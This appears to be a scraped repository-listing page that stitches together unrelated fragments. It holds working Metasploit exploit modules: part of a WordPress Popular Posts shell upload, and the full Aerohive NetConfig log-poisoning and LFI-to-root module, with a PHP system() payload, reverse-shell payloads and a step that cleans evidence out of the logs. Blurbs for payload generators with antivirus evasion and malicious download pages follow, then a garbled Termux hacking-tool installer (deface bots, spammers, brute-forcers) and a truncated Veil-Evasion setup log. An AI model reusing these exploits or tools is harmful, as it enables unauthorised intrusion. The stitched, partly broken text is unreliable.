'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 /data-widget-id="wpp-(?<widget_id>\d+)/ =~ @res.body # load the widget directly (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? vprint_error('Invalid login, check credentials') return end payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php" vprint_status("Payload file name: #{payload_name}") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status("wpp_admin_token: #{token}") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => "/#{payload_name}" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, "Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.") # end # at this point, we rely on our web server getting requests to make the rest happen endend### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE', 'Description' => %q{ This module exploits LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user. NetConfig is the Aerohive/Extreme Networks HiveOS administrative webinterface. Vulnerable versions allow for LFI because they rely on a version of PHP 5 that is vulnerable to string truncation attacks. This module leverages this issue in conjunction with log poisoning to gain RCE as root. Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open. Closing the session should render the app responsive again. The module provides an automatic cleanup option to clean the log. However, this option is disabled by default because any modifications to the /tmp/messages log, even via sed, may render the target (temporarily) unexploitable. This state can last over an hour. This module has been successfully tested against Aerohive NetConfig versions 8.2r4 and 10.0r7a. }, 'License' => MSF_LICENSE, 'Author' => [ 'Erik de Jong', # github.com/eriknl - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-16152'], # still categorized as RESERVED ['URL', 'https://github.com/eriknl/CVE-2020-16152'] # analysis and PoC code ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Platform' => %w[linux unix], 'Arch' => [ ARCH_ARMLE, ARCH_CMD ], 'Targets' => [ [ 'Linux', { 'Arch' => [ARCH_ARMLE], 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', 'CMDSTAGER::FLAVOR' => 'curl' } } ], [ 'CMD', { 'Arch' => [ARCH_CMD], 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works for this target' } } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-02-17', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']), OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the /tmp/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]), ] end def auto_clean_log datastore['AUTO_CLEAN_LOG'] end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php5') }) unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('Aerohive NetConfig UI') return CheckCode::Safe('Target is not an Aerohive NetConfig application.') end version = res.body.scan(/action="login\.php5\?version=(.*?)"/)&.flatten&.first unless version return CheckCode::Detected('Could not determine Aerohive NetConfig version.') end begin if Rex::Version.new(version) <= Rex::Version.new('10.0r8a') return CheckCode::Appears("The target is Aerohive NetConfig version #{version}") else print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.') return CheckCode::Safe("The target is Aerohive NetConfig version #{version}") end rescue StandardError => e return CheckCode::Unknown("Failed to obtain a valid Aerohive NetConfig version: #{e}") end end def poison_log password = rand_text_alphanumeric(8..12) @shell_cmd_name = rand_text_alphanumeric(3..6) @poison_cmd = "<?php system($_POST['#{@shell_cmd_name}']);?>" # Poison /tmp/messages print_status('Attempting to poison the log at /tmp/messages...') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login.php5'), 'vars_post' => { 'login_auth' => 0, 'miniHiveUI' => 1, 'authselect' => 'Name/Password', 'userName' => @poison_cmd, 'password' => password } }) unless res fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at /tmp/messages') end unless res.code == 200 && res.body.include?('cmn/redirectLogin.php5?ERROR_TYPE=MQ==') fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at /tmp/messages') end print_status('Server responded as expected. Continuing...') end def on_new_session(session) log_cleaned = false if auto_clean_log print_status('Attempting to clean the log file at /tmp/messages...') print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.') begin # We need remove the line containing the PHP system call from /tmp/messages # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username. # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite /tmp/messages with it, is the same: # In both cases the app will likely stop writing to /tmp/messages for quite a while (could be over an hour), rendering the target unexploitable during that period. line_to_delete_file = "/tmp/#{rand_text_alphanumeric(5..10)}" clean_messages_file = "/tmp/#{rand_text_alphanumeric(5..10)}" cmds_to_clean_log = "grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system' > #{line_to_delete_file}; "\ "grep -vFf #{line_to_delete_file} /tmp/messages > #{clean_messages_file}; mv #{clean_messages_file} /tmp/messages; rm -f #{line_to_delete_file}" if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute('/bin/sh', "-c \"#{cmds_to_clean_log}\"") # Wait for cleanup Rex.sleep 5 # Check for the PHP system call in /tmp/messages messages_contents = session.fs.file.open('/tmp/messages').read.to_s # using =~ here produced unexpected results, so include? is used instead unless messages_contents.include?(@poison_cmd) log_cleaned = true end elsif session.type.to_s.eql?('shell') session.shell_command_token(cmds_to_clean_log.to_s) # Check for the PHP system call in /tmp/messages poison_evidence = session.shell_command_token("grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system'") # using =~ here produced unexpected results, so include? is used instead unless poison_evidence.include?(@poison_cmd) log_cleaned = true end end rescue StandardError => e print_error("Error during cleanup: #{e.message}") ensure super end unless log_cleaned print_warning("Could not replace the PHP system call '#{@poison_cmd}' in /tmp/messages") end end if log_cleaned print_good('Successfully cleaned up the log by deleting the line with the PHP syscal from /tmp/messages.') else print_warning("Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:\n\t#{@poison_cmd}") print_warning('Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.') print_warning('Deleting /tmp/messages or clearing out the file may break the application.') end end def execute_command(cmd, _opts = {}) print_status('Attempting to execute the payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'action.php5'), 'vars_get' => { '_action' => 'list', 'debug' => 'true' }, 'vars_post' => { '_page' => rand_text_alphanumeric(1) + '/..' * 8 + '/' * 4041 + '/tmp/messages', # Trigger LFI through path truncation @shell_cmd_name => cmd } }, 0) print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.') end def exploit poison_log if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end endend
samglish
exploit the vulnerability with Shodan in Metasploit and use Sodan in the terminal.
boychongzen18
Metasploit.sh
R47DEV
this tool only for educational purpose . Disclaimer: We are no responsibility any action . if you want you use for educational purpose follow the step : apt-get install git git clone https://github.com/wh-hackerexploit/hackerexploit.git cd hackerexploit chmod 777 * ./hackexploit.sh Requirements pkg metasploit touch apktool _________________________________________ and by defult automacit install other pkg this tool create by { White-Hat (Hack Exploit) }
raviraj121
#Bismillah #Assalamu-Alaikum [!] Tmvenom :- Tmvenom is a python based tool specially designed for Termux users.This payload generates some basic payloads using metasploit-framework.so You must install metasploit framework on your Termux.This tool works both rooted and non rooted devices.This is very helpfull for beginners. [+] Requirments:- Termux APp metasploit-framework [+] Author :- Name : Mujeeb Youtube: www.youtube.com/TechnicalMujeeb Github: https://github.com/TechnicalMujeeb/tmvenom.git Whatsapp : Termux Cyber [+] Installation :- apt update apt upgrade apt install git apt install python2 git clone https://github.com/TechnicalMujeeb/tmvenom.git cd tmvenom chmod +x * sh install.sh [+] Usage :- python2 tmvenom.py (select payload options and you can easily generates payloads)
Version release : v1.0.16 Author : pedro ubuntu [ r00t-3xp10it ] Codename: Aconite (Aconitum napellus) Distros Supported : Linux Ubuntu, Kali, Mint, Parrot OS Suspicious-Shell-Activity (SSA) RedTeam develop @2019 banner LEGAL DISCLAMER The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law. So use this tool responsibly. FRAMEWORK DESCRIPTION The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( C# | python | ruby dll | msi | hta-psh | docm | apk | macho | elf | deb | mp4 | etc ) injects the shellcode generated into one template (example: python) "the python funtion will execute the shellcode into ram" and uses compilers like gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file. It also starts a multi-handler to recive the remote connection (shell or meterpreter session). 'venom generator' reproduces some of the technics used by Veil-Evasion.py, unicorn.py, powersploit.py, etc.. HOW DO I DELIVER MY PAYLOADS TO TARGET HOST ? venom 1.0.11 (malicious_server) was build to take advantage of apache2 webserver to deliver payloads (LAN) using a fake webpage writen in html that takes advantage of <iframe> <meta-http-equiv> or <form> tags to be hable to trigger payload downloads, the user just needs to send the link provided to target host. "Apache2 (malicious url) will copy all files needed to your webroot, and starts apache for you." venom shellcode v1.0.16 DEPENDENCIES Zenity | Metasploit | GCC (compiler) | Pyinstaller (compiler) | mingw32 (compiler) | pyherion.py (crypter) wine (emulator) | PEScrambler.exe (PE obfuscator) | apache2 (webserver)| winrar (wine) | shellter (KyRecon) vbs-obfuscator (obfuscator) | avet (Daniel Sauder) | ettercap (MitM + DNS_Spoofing) | icmpsh (ICMP shell) openssl (build SSL certs) | CarbonCopy (sign exe binarys) | ResourceHacker (wine) | NXcrypt (python crypter) "venom.sh will download/install all dependencies as they are needed". Adicionally was build the script venom-main/aux/setup.sh to help you install all framework dependencies fast and easy. we just need to install first the most importante dependencies before trigger setup.sh = zenity, metasploit, ettercap .. DOWNLOAD/INSTALL 1º - Download framework from github git clone https://github.com/r00t-3xp10it/venom.git 2º - Set execution permitions cd venom-main sudo find ./ -name "*.sh" -exec chmod +x {} \; sudo find ./ -name "*.py" -exec chmod +x {} \; 3º - Install all dependencies cd aux && sudo ./setup.sh 4º - Run main tool sudo ./venom.sh Update venom instalation (compare local version againts github oficial version) sudo ./venom.sh -u Framework Main Menu banner venom shellcode v1.0.16 venom shellcode v1.0.16 Detailed info about release 1.0.16: https://github.com/r00t-3xp10it/venom/releases
X-HACKRAWI
mshbrute.sh ==> *This script does three functions. first it accepts shodan_api_key ,shodan_query usernames , passwords and then it automates the process of supplying the parameters to metasploit to provide you with a file.csv containing all ip address with information. Second it parses the file.csv to obtain only IP Addressses and save them into a file called hostsPerLine.txt. Thirdly, it performs a bruteforce attack on the hosts obtained from metasploit with a specific service.
xienan917
blue='\e[0;34' cyan='\e[0;36m' green='\e[0;34m' okegreen='\033[92m' lightgreen='\e[1;32m' white='\e[1;37m' red='\e[1;31m' yellow='\e[1;33m' ################################################### # CTRL C ################################################### trap ctrl_c INT ctrl_c() { clear echo -e $red"[#]> (Ctrl + C ) Detected, Trying To Exit ... " sleep 1 echo "" echo -e $green"[#]> Terima kasih sudah make tools saya ... " sleep 1 echo "" echo -e $white"[#]> THx17k Wuzz Here ... " read enter exit } echo -e $red" _ __ __ _ _ __" echo -e $red" / |/ /_ / _/_ _/ /_ (_) /" echo -e $white" / /|/ / _// /__/ _ / _// / / " echo -e $white" // /// ()_/\_,//\_\/// " echo -e $red" *****************" echo -e $white" # $red toolkit for hackers v2.1 $white $ echo -e $red" # $red happy fun guys $red #" echo -e $white" # $red contact: officialthx17k@gmail.com $white $ echo -e $red" # $white greetz : jelangkung squad {R.I.P} $red#" echo -e $white" # $white copyright : THx17k $white $ echo -e $red" # $white thanks to : Jelangkung squad $red #" echo -e $white" *****************" echo "" echo -e $green" 01) Red Hawk" echo -e $green" 02) D-Tect" echo -e $green" 03) Hunner" echo -e $green" 04) WPScan" echo -e $green" 05) Webdav" echo -e $green" 06) Metasploit" echo -e $green" 07) Kali Nethunter" echo -e $green" 08) Ubuntu" echo -e $green" 09) Youtube Dl" echo -e $green" 10) viSQL " echo -e $green" 11) Weeman" echo -e $green" 12) WFDroid" echo -e $green" 13) FBBrute"echo -e $green" 13) FBBrute" echo -e $green" 14) Ngrok" echo -e $green" 15) Torshammer " echo -e $green" 16) RouterSploit " echo -e $green" 17) Hydra " echo -e $green" 18) Weevely " echo -e $green" 19) SQLMap " echo -e $green" 20) Dirbuster " echo -e $green" 21) admin finder " echo -e $green" 22) lokomedia exploiter " echo -e $green" 23) elfinder exploiter " echo -e $green" 24) magento add admin exploiter " echo -e $green" 25) scanner tools " echo -e $green" 26) bing dorker " echo -e $green" 27) katoolin " echo -e $green" 28) arch linux " echo -e $green" 29) linux fedora" echo -e $green" 30) hash-buster" echo -e $green" 31) sudo" echo -e $green" 32) aircrack-ng" echo -e $green" 33) joomscan" echo -e $green" 34) bing-ip2hosts" echo -e $green" 35) BlueMaho" echo -e $green" 36) Bluepot" echo -e $green" 37) honeypot" echo -e $green" 38) bot auto deface 1" echo -e $green" 39) bot auto deface 2" echo -e $green" 40) mailer sender cli" echo -e $green" 41) Wordpress Brute Force" echo -e $green" 42) Oh-myzsh theme for termux" echo -e $green" 43) instabot (instagram bot)"echo -e $green" 43) instabot (instagram bot)" echo -e $green" 44) fsociety" echo -e $green" 45) Cms Scanner" echo -e $green" 46) Information Gathering" echo -e $green" 47) com_fabrik exploiter" echo -e $green" 48) com foxcontact exploiter" echo -e $green" 49) gmail brute force" echo -e $green" 50) ezsploit" echo -e $green" 51) spammer-grab sms" echo -e $green" 52) spammer call toko-pedia" echo -e $green" 53) The Fat Rat" echo -e $green" 54) IPGeolocation" echo -e $green" 55) exit" echo -e $white"" read -p "[mrcakil@Tools]> " act; if [ $act = 01 ] || [ $act = 01 ] then clear echo -e $green" Installing Red Hawk " sleep 1 apt update && apt upgrade apt install php apt install git git clone https://github.com/Tuhinshubhra/RED_HAWK echo -e $green" Done Install Cuk " fi if [ $act = 02 ] || [ $act = 02 ] then clearif [ $act = 03 ] || [ $act = 03 ] then clear echo -e $green" Installing Hunner " sleep 1 apt-get update && apt-get upgrade apt install python apt install git git clone https://github.com/b3-v3r/Hunner echo -e $red" Done Install Cuk " fi if [ $act = 03 ] || [ $act = 03 ] then clear echo -e $green" Installing Hunner " sleep 1 apt-get update && apt-get upgrade apt install python apt install git git clone https://github.com/b3-v3r/Hunner echo -e $red" Done Install Cuk " fi if [ $act = 04 ] || [ $act = 04 ] then clear echo -e $green" Installing Wpscan " sleep 1 apt-get update && apt-get upgrade apt install ruby apt install curl apt install git git clone https://github.com/wpscanteam/wpscan cd ~/wpscan gem install bundle bundle config build.nokogiri --use-system-libraries bundle install ruby wpscan.rb --update cd ~/ echo -e $red" Done Install THx17k gans " fi if [ $act = 05 ] || [ $act = 05 ] then clear echo -e $green" Installing Webdav " sleep 1 apt update && apt upgrade apt install python2 pip2 install urllib3 chardet certifi idna requests apt install openssl curl pkg install libcurl mkdir webdav cd ~/webdav wget https://pastebin.com/raw/HnVyQPtR -O webdav.py chmod 777 webdav.py cd ~/ echo -e $red" Done Install THx17k gans " if [ $act = 06 ] || [ $act = 06 ] then clear echo -e $green" Installing Metasploit " sleep 1 apt update && apt upgrade apt install git apt install wget wget https://raw.githubusercontent.com/verluchie/termux-metasploit/master/insta$ chmod 777 install.sh sh install.sh echo -e $red" Done Install Goblok " fi if [ $act = 07 ] || [ $act = 07 ] then clear echo -e $green" Installing Kali Nethunter " sleep 1 apt update && apt upgrade apt install git git clone https://github.com/Hax4us/Nethunter-In-Termux.git cd ~/Nethunter-In-Termux chmod 777 kalinethunter sh kalinethunter echo -e $red" Done Install Ngentod " fi if [ $act = 08 ] || [ $act = 08 ] then clear echo -e $green" Installing Ubuntu " sleep 1 apt update && apt upgrade apt install git apt install wget apt install proot git clone https://github.com/Neo-Oli/termux-ubuntu.git cd ~/termux-ubuntu chmod +x ubuntu.sh sh ubuntu.sh echo " Fix network please wait " sleep 1 echo "nameserver 8.8.8.8" > /data/data/com.termux/files/home/termux-ubuntu/ubun$ echo -e $red" Done Install Anjing " fi if [ $act = 09 ] || [ $act = 09 ] then clear echo -e $green" Installing Youtube DL " sleep 1 apt update && apt upgrade apt install python pip3 install mps_youtube pip3 install youtube_dl apt install mpv echo " Untuk menjalankannya ketik "mpsyt" tanpa tanda petik " echo -e $red" Done Install bgsd " fi if [ $act = 10 ] || [ $act = 10 ] then clear echo -e $green" Installing viSQL " sleep 1 apt update && apt upgrade pkg install git pkg install python2 git clone https://github.com/blackvkng/viSQL.git cd ~/viSQL chmod 777 viSQL.py cd ~/ echo -e $red" Done Install Bgsd " fi if [ $act = 11 ] || [ $act = 11 ] then clear echo -e $green" Installing Weeman " sleep 1 apt update && apt upgrade pkg install git apt install python2 git clone https://github.com/samyoyo/weeman cd ~/weeman pip2 install beautifulsoup pip2 install bs4 cd ~/ echo -e $red" Done Install Fuck " fi
No description available
CYBERSECARYAN
METASPLOIT V5 , FOR TERMUX BY ARYAN SEN - CYBER SEC
mohammadhacker10
Metasploit
nadhmiamri
========================================================================== Veil-Evasion (Setup Script) | [Updated]: 2016-09-09 ========================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================== [I] Ubuntu 16 x86_64 detected... [*] Initializing package installation [*] Adding x86 architecture to x86_64 system for Wine W: The repository 'http://ppa.launchpad.net/backbox/four/ubuntu xenial Release' does not have a Release file. W: The repository 'http://ppa.launchpad.net/gwibber-daily/ppa/ubuntu xenial Release' does not have a Release file. W: GPG error: http://kali.mirror.garr.it/mirrors/kali kali-dev InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY ED444FF07D8D0BF6 W: The repository 'http://http.kali.org/kali kali-dev InRelease' is not signed. E: Failed to fetch http://ppa.launchpad.net/backbox/four/ubuntu/dists/xenial/main/binary-amd64/Packages 404 Not Found E: Failed to fetch http://ppa.launchpad.net/gwibber-daily/ppa/ubuntu/dists/xenial/main/binary-amd64/Packages 404 Not Found E: Some index files failed to download. They have been ignored, or old ones used instead. [*] Installing Wine 32-bit and 64-bit binaries E: Unable to locate package wine-stable E: Package 'wine1.6' has no installation candidate E: Package 'wine1.6-i386' has no installation candidate [ERROR] Failed to install Wine... Exit code: 100 [*] ALERT: Existing Veil Wine environment detected at /home/nadhmi/.config/wine/veil Do you want to nuke it? (recommended) [Y/n]: y [*] Deleting existing Veil Wine environment... [*] Creating new Veil Wine environment in: /home/nadhmi/.config/wine/veil [*] Initializing Veil's Wine environment... sudo: wine: command not found [ERROR] Veil Wine environment could not be found! [ERROR] Check for existence of /home/nadhmi/.config/wine/veil/drive_c [*] Installing dependencies Reading package lists... Done Building dependency tree Reading state information... Done E: Unable to locate package wine-stable [ERROR] Failed to install dependencies... Exit code: 100 [*] Installing Capstone dependencies... [*] Installing Capstone (via Source) Cloning into '/home/nadhmi/Veil-Evasion/setup/capstone'... remote: Counting objects: 21285, done. remote: Compressing objects: 100% (12/12), done. /opt/metasploit-framework/Receiving objects: 27% (5947/21285), 8.11 MiB | 558.0remote: Total 21285 (delta 2), reused 0 (delta 0), pack-reused 21273 Receiving objects: 100% (21285/21285), 32.09 MiB | 387.00 KiB/s, done. Resolving deltas: 100% (15157/15157), done. Checking connectivity... done. Note: checking out 'b53a59af53ffbd5dbe8dbcefba41a00cf4fc7469'. You are in 'detached HEAD' state. You can look around, make experimental changes and commit them, and you can discard any commits you make in this state without impacting any branches by performing another checkout. If you want to create a new branch to retain commits you create, you may do so (now or later) by using -b with the checkout command again. Example: git checkout -b <new-branch-name> HEAD is now at b53a59a... update ChangeLog for 3.0 rm -f ./cs.o ./utils.o ./SStream.o ./MCInstrDesc.o ./MCRegisterInfo.o ./arch/ARM/ARMDisassembler.o ./arch/ARM/ARMInstPrinter.o ./arch/ARM/ARMMapping.o ./arch/ARM/ARMModule.o ./arch/AArch64/AArch64BaseInfo.o ./arch/AArch64/AArch64Disassembler.o ./arch/AArch64/AArch64InstPrinter.o ./arch/AArch64/AArch64Mapping.o ./arch/AArch64/AArch64Module.o ./arch/Mips/MipsDisassembler.o ./arch/Mips/MipsInstPrinter.o ./arch/Mips/MipsMapping.o ./arch/Mips/MipsModule.o ./arch/PowerPC/PPCDisassembler.o ./arch/PowerPC/PPCInstPrinter.o ./arch/PowerPC/PPCMapping.o ./arch/PowerPC/PPCModule.o ./arch/Sparc/SparcDisassembler.o ./arch/Sparc/SparcInstPrinter.o ./arch/Sparc/SparcMapping.o ./arch/Sparc/SparcModule.o ./arch/SystemZ/SystemZDisassembler.o ./arch/SystemZ/SystemZInstPrinter.o ./arch/SystemZ/SystemZMapping.o ./arch/SystemZ/SystemZModule.o ./arch/SystemZ/SystemZMCTargetDesc.o ./arch/X86/X86DisassemblerDecoder.o ./arch/X86/X86Disassembler.o ./arch/X86/X86IntelInstPrinter.o ./arch/X86/X86ATTInstPrinter.o ./arch/X86/X86Mapping.o ./arch/X86/X86Module.o ./arch/XCore/XCoreDisassembler.o ./arch/XCore/XCoreInstPrinter.o ./arch/XCore/XCoreMapping.o ./arch/XCore/XCoreModule.o ./MCInst.o rm -f ./libcapstone.* ./capstone.* rm -f ./capstone.pc cd tests && make clean make[1]: Entering directory '/home/nadhmi/Veil-Evasion/setup/capstone/tests' rm -rf ./test.o ./test_detail.o ./test_skipdata.o ./test_iter.o ./test_arm.o ./test_arm64.o ./test_mips.o ./test_ppc.o ./test_sparc.o ./test_systemz.o ./test_x86.o ./test_xcore.o ./test ./test_detail ./test_skipdata ./test_iter ./test_arm ./test_arm64 ./test_mips ./test_ppc ./test_sparc ./test_systemz ./test_x86 ./test_xcore ./*.exe ./*.static ./libcapstone.* ./capstone.* make[1]: Leaving directory '/home/nadhmi/Veil-Evasion/setup/capstone/tests' rm -f ./tests/libcapstone.so cd bindings/python && make clean make[1]: Entering directory '/home/nadhmi/Veil-Evasion/setup/capstone/bindings/python' rm -rf ./build rm -f capstone/*.so make[1]: Leaving directory '/home/nadhmi/Veil-Evasion/setup/capstone/bindings/python' cd bindings/java && make clean make[1]: Entering directory '/home/nadhmi/Veil-Evasion/setup/capstone/bindings/java' rm -rf ./capstone/*.class rm -rf ./*.class ./*.log ./*.jar make[1]: Leaving directory '/home/nadhmi/Veil-Evasion/setup/capstone/bindings/java' cd bindings/ocaml && make clean make[1]: Entering directory '/home/nadhmi/Veil-Evasion/setup/capstone/bindings/ocaml' rm -f *.[oa] *.so *.cm[ixoa] *.cmxa *.mli test test_detail test_x86 test_arm test_arm64 test_mips test_ppc test_sparc test_systemz test_xcore make[1]: Leaving directory '/home/nadhmi/Veil-Evasion/setup/capstone/bindings/ocaml' CC cs.o CC utils.o CC SStream.o CC MCInstrDesc.o CC MCRegisterInfo.o CC arch/ARM/ARMDisassembler.o CC arch/ARM/ARMInstPrinter.o CC arch/ARM/ARMMapping.o CC arch/ARM/ARMModule.o CC arch/AArch64/AArch64BaseInfo.o CC arch/AArch64/AArch64Disassembler.o CC arch/AArch64/AArch64InstPrinter.o CC arch/AArch64/AArch64Mapping.o CC arch/AArch64/AArch64Module.o CC arch/Mips/MipsDisassembler.o CC arch/Mips/MipsInstPrinter.o CC arch/Mips/MipsMapping.o CC arch/Mips/MipsModule.o CC arch/PowerPC/PPCDisassembler.o CC arch/PowerPC/PPCInstPrinter.o CC arch/PowerPC/PPCMapping.o CC arch/PowerPC/PPCModule.o CC arch/Sparc/SparcDisassembler.o CC arch/Sparc/SparcInstPrinter.o CC arch/Sparc/SparcMapping.o CC arch/Sparc/SparcModule.o CC arch/SystemZ/SystemZDisassembler.o CC arch/SystemZ/SystemZInstPrinter.o CC arch/SystemZ/SystemZMapping.o CC arch/SystemZ/SystemZModule.o CC arch/SystemZ/SystemZMCTargetDesc.o CC arch/X86/X86DisassemblerDecoder.o CC arch/X86/X86Disassembler.o CC arch/X86/X86IntelInstPrinter.o CC arch/X86/X86ATTInstPrinter.o CC arch/X86/X86Mapping.o CC arch/X86/X86Module.o CC arch/XCore/XCoreDisassembler.o CC arch/XCore/XCoreInstPrinter.o CC arch/XCore/XCoreMapping.o CC arch/XCore/XCoreModule.o CC MCInst.o LINK libcapstone.so AR libcapstone.a ar: creating ./libcapstone.a GEN capstone.pc cd tests && make make[1]: Entering directory '/home/nadhmi/Veil-Evasion/setup/capstone/tests' CC test.o CC test_detail.o CC test_skipdata.o CC test_iter.o CC test_arm.o CC test_arm64.o CC test_mips.o CC test_ppc.o CC test_sparc.o CC test_systemz.o CC test_x86.o CC test_xcore.o LINK test LINK test.static LINK test_detail LINK test_detail.static LINK test_skipdata LINK test_skipdata.static LINK test_iter LINK test_iter.static LINK test_arm LINK test_arm.static LINK test_arm64 LINK test_arm64.static LINK test_mips LINK test_mips.static LINK test_ppc LINK test_ppc.static LINK test_sparc LINK test_sparc.static LINK test_systemz LINK test_systemz.static LINK test_x86 LINK test_x86.static LINK test_xcore LINK test_xcore.static make[1]: Leaving directory '/home/nadhmi/Veil-Evasion/setup/capstone/tests' install -m0644 ./libcapstone.so ./tests/ mkdir -p /usr/lib install -m0755 ./libcapstone.so /usr/lib cd /usr/lib && \ mv libcapstone.so libcapstone.so.3 && \ ln -s libcapstone.so.3 libcapstone.so install -m0644 ./libcapstone.a /usr/lib mkdir -p /usr/include/capstone install -m0644 include/*.h /usr/include/capstone mkdir -p /usr/lib/pkgconfig install -m0644 ./capstone.pc /usr/lib/pkgconfig/ rm -rf ./build python setup.py build -b ./build install running build running build_py creating build creating build/lib.linux-x86_64-2.7 creating build/lib.linux-x86_64-2.7/capstone copying capstone/ppc.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/mips_const.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/x86.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/sparc.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/xcore.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/systemz.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/__init__.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/mips.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/ppc_const.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/sparc_const.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/xcore_const.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/arm64.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/arm_const.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/sysz_const.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/x86_const.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/arm64_const.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/arm.py -> ./build/lib.linux-x86_64-2.7/capstone running install running install_lib copying ./build/lib.linux-x86_64-2.7/capstone/ppc.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/mips_const.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/x86.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/sparc.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/xcore.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/systemz.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/__init__.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/mips.py -> /usr/local/lib/python2.7/dist-packages/capstone copying 